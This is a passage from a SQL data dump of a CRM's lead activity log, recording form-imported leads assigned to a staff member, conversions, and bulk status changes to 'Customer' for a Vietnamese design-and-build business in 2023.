(560, 274, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-06 09:15:37', 0, '[CRON]', 0),
(561, 275, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-04-06 09:15:55', 0, '[CRON]', 0),
(562, 275, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-06 09:15:55', 0, '[CRON]', 0),
(565, 277, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-04-06 09:16:34', 0, '[CRON]', 0),
(566, 277, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-06 09:16:34', 0, '[CRON]', 0),
(567, 278, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-04-06 09:16:59', 0, '[CRON]', 0),
(568, 278, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-06 09:16:59', 0, '[CRON]', 0),
(569, 279, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-04-06 09:17:21', 0, '[CRON]', 0),
(570, 279, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-06 09:17:21', 0, '[CRON]', 0),
(571, 280, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-04-07 09:07:36', 0, '[CRON]', 0),
(572, 280, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-07 09:07:36', 0, '[CRON]', 0),
(573, 281, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-04-07 09:07:51', 0, '[CRON]', 0),
(574, 281, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-07 09:07:51', 0, '[CRON]', 0),
(575, 282, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-04-07 09:09:08', 0, '[CRON]', 0),
(576, 282, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-07 09:09:08', 0, '[CRON]', 0),
(577, 283, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-04-07 09:09:28', 0, '[CRON]', 0),
(578, 283, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-07 09:09:28', 0, '[CRON]', 0),
(579, 284, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-04-07 09:09:43', 0, '[CRON]', 0),
(580, 284, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-07 09:09:43', 0, '[CRON]', 0),
(581, 285, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-04-07 13:53:13', 0, '[CRON]', 0),
(582, 285, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-07 13:53:13', 0, '[CRON]', 0),
(583, 286, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-04-07 13:53:28', 0, '[CRON]', 0),
(584, 286, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-07 13:53:28', 0, '[CRON]', 0),
(585, 287, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-04-07 13:53:47', 0, '[CRON]', 0),
(586, 287, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-07 13:53:47', 0, '[CRON]', 0),
(591, 290, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-04-10 09:06:15', 0, '[CRON]', 0),
(592, 290, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-10 09:06:15', 0, '[CRON]', 0),
(593, 291, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-04-10 09:06:49', 0, '[CRON]', 0),
(594, 291, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-10 09:06:49', 0, '[CRON]', 0),
(595, 292, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-04-10 09:07:09', 0, '[CRON]', 0),
(596, 292, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-10 09:07:09', 0, '[CRON]', 0),
(599, 294, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-04-10 09:57:45', 0, '[CRON]', 0),
(600, 294, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-10 09:57:45', 0, '[CRON]', 0),
(601, 295, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-04-10 09:58:23', 0, '[CRON]', 0),
(602, 295, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-10 09:58:23', 0, '[CRON]', 0),
(603, 296, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-04-10 09:58:45', 0, '[CRON]', 0),
(604, 296, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-10 09:58:45', 0, '[CRON]', 0),
(605, 297, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-04-10 10:01:32', 0, '[CRON]', 0),
(606, 297, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-10 10:01:32', 0, '[CRON]', 0),
(607, 298, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-04-10 10:01:54', 0, '[CRON]', 0),
(608, 298, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-10 10:01:54', 0, '[CRON]', 0),
(611, 300, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-04-11 09:06:08', 0, '[CRON]', 0),
(612, 300, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-11 09:06:08', 0, '[CRON]', 0),
(613, 301, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-04-11 09:06:36', 0, '[CRON]', 0),
(614, 301, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-11 09:06:36', 0, '[CRON]', 0),
(615, 302, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-04-11 09:06:54', 0, '[CRON]', 0),
(616, 302, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-11 09:06:54', 0, '[CRON]', 0),
(619, 304, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-04-11 09:07:35', 0, '[CRON]', 0),
(620, 304, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-11 09:07:35', 0, '[CRON]', 0),
(621, 305, 'not_lead_imported_from_form', 'a:1:{i:0;s:18:\"www.quattranvn.com\";}', '2023-04-24 02:23:42', 0, '[CRON]', 0),
(622, 305, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-24 02:23:42', 0, '[CRON]', 0),
(623, 305, 'not_lead_activity_log_attachment', 'a:1:{i:0;s:18:\"www.quattranvn.com\";}', '2023-04-24 02:23:42', 0, '[CRON]', 0),
(627, 307, 'not_lead_imported_from_form', 'a:1:{i:0;s:18:\"www.quattranvn.com\";}', '2023-04-24 06:40:46', 0, '[CRON]', 0),
(628, 307, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-24 06:40:46', 0, '[CRON]', 0),
(629, 307, 'not_lead_activity_log_attachment', 'a:1:{i:0;s:18:\"www.quattranvn.com\";}', '2023-04-24 06:40:46', 0, '[CRON]', 0),
(630, 308, 'not_lead_imported_from_form', 'a:1:{i:0;s:18:\"www.quattranvn.com\";}', '2023-04-25 14:39:34', 0, '[CRON]', 0),
(631, 308, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-04-25 14:39:34', 0, '[CRON]', 0),
(632, 309, 'not_lead_imported_from_form', 'a:1:{i:0;s:18:\"www.quattranvn.com\";}', '2023-05-03 16:21:14', 0, '[CRON]', 0),
(633, 309, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-05-03 16:21:14', 0, '[CRON]', 0),
(634, 310, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-05-08 18:20:25', 0, '[CRON]', 0),
(635, 310, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-05-08 18:20:25', 0, '[CRON]', 0),
(636, 310, 'not_lead_activity_converted', 'a:1:{i:0;s:11:\"Ho Gia Phat\";}', '2023-05-08 18:20:37', 1, 'Ho Gia Phat', 0),
(637, 304, 'not_lead_activity_converted', 'a:1:{i:0;s:11:\"Ho Gia Phat\";}', '2023-05-08 18:21:01', 1, 'Ho Gia Phat', 0),
(638, 298, 'not_lead_activity_converted', 'a:1:{i:0;s:11:\"Ho Gia Phat\";}', '2023-05-08 18:21:44', 1, 'Ho Gia Phat', 0),
(639, 311, 'not_lead_imported_from_form', 'a:1:{i:0;s:18:\"www.quattranvn.com\";}', '2023-05-14 21:54:58', 0, '[CRON]', 0),
(640, 311, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-05-14 21:54:58', 0, '[CRON]', 0),
(641, 312, 'not_lead_imported_from_form', 'a:1:{i:0;s:18:\"www.quattranvn.com\";}', '2023-06-16 14:09:41', 0, '[CRON]', 0),
(642, 312, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-06-16 14:09:41', 0, '[CRON]', 0),
(643, 313, 'not_lead_imported_from_form', 'a:1:{i:0;s:18:\"www.quattranvn.com\";}', '2023-06-25 10:41:09', 0, '[CRON]', 0),
(644, 313, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-06-25 10:41:09', 0, '[CRON]', 0),
(645, 314, 'not_lead_imported_from_form', 'a:1:{i:0;s:18:\"www.quattranvn.com\";}', '2023-06-28 07:32:19', 0, '[CRON]', 0),
(646, 314, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-06-28 07:32:20', 0, '[CRON]', 0),
(647, 315, 'not_lead_imported_from_form', 'a:1:{i:0;s:18:\"www.quattranvn.com\";}', '2023-07-26 09:45:25', 0, '[CRON]', 0),
(648, 315, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-07-26 09:45:25', 0, '[CRON]', 0),
(649, 316, 'not_lead_imported_from_form', 'a:1:{i:0;s:18:\"www.quattranvn.com\";}', '2023-07-31 15:42:46', 0, '[CRON]', 0),
(650, 316, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-07-31 15:42:46', 0, '[CRON]', 0),
(651, 317, 'not_lead_imported_from_form', 'a:1:{i:0;s:18:\"www.quattranvn.com\";}', '2023-08-18 16:13:42', 0, '[CRON]', 0),
(652, 317, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-08-18 16:13:42', 0, '[CRON]', 0),
(653, 317, 'not_lead_activity_log_attachment', 'a:1:{i:0;s:18:\"www.quattranvn.com\";}', '2023-08-18 16:13:42', 0, '[CRON]', 0),
(654, 318, 'not_lead_imported_from_form', 'a:1:{i:0;s:18:\"www.quattranvn.com\";}', '2023-08-18 16:24:12', 0, '[CRON]', 0),
(655, 318, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-08-18 16:24:12', 0, '[CRON]', 0),
(656, 319, 'not_lead_imported_from_form', 'a:1:{i:0;s:18:\"www.quattranvn.com\";}', '2023-09-06 05:33:20', 0, '[CRON]', 0),
(657, 319, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-09-06 05:33:20', 0, '[CRON]', 0),
(658, 320, 'not_lead_imported_from_form', 'a:1:{i:0;s:18:\"www.quattranvn.com\";}', '2023-09-09 10:37:56', 0, '[CRON]', 0),
(659, 320, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-09-09 10:37:56', 0, '[CRON]', 0),
(660, 49, 'not_lead_activity_converted', 'a:1:{i:0;s:11:\"Ho Gia Phat\";}', '2023-09-20 10:12:46', 1, 'Ho Gia Phat', 0),
(661, 321, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-09-20 10:16:10', 0, '[CRON]', 0),
(662, 321, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:77:\"<a href=\"https://hgphome.com/admin/profile/1\" target=\"_blank\">Ho Gia Phat</a>\";}', '2023-09-20 10:16:10', 0, '[CRON]', 0),
(663, 34, 'not_lead_activity_converted', 'a:1:{i:0;s:11:\"Ho Gia Phat\";}', '2023-09-20 10:27:13', 1, 'Ho Gia Phat', 0),
(664, 8, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:15:\"KH Tiềm năng\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(665, 12, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:15:\"KH Tiềm năng\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(666, 13, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:15:\"KH Tiềm năng\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(667, 15, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:15:\"KH Tiềm năng\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(668, 18, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:15:\"KH Tiềm năng\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(669, 19, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:15:\"KH Tiềm năng\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(671, 24, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:15:\"KH Tiềm năng\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(672, 25, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:15:\"KH Tiềm năng\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(673, 33, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(674, 35, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(675, 36, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(676, 37, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(677, 38, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(678, 39, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(679, 40, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(680, 41, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(681, 42, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(682, 43, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(683, 44, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(684, 45, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(685, 47, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(686, 48, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(687, 50, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(688, 51, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(689, 53, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(690, 54, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(691, 55, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(692, 56, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(693, 57, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(694, 58, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(695, 59, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(696, 60, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(697, 61, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(698, 62, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(699, 64, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(700, 65, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(701, 66, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(702, 67, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(703, 68, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(704, 69, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(705, 70, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(706, 71, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(707, 72, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(708, 73, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(709, 75, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(710, 76, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(711, 77, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(712, 78, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(713, 79, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(714, 80, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(715, 81, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(716, 82, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
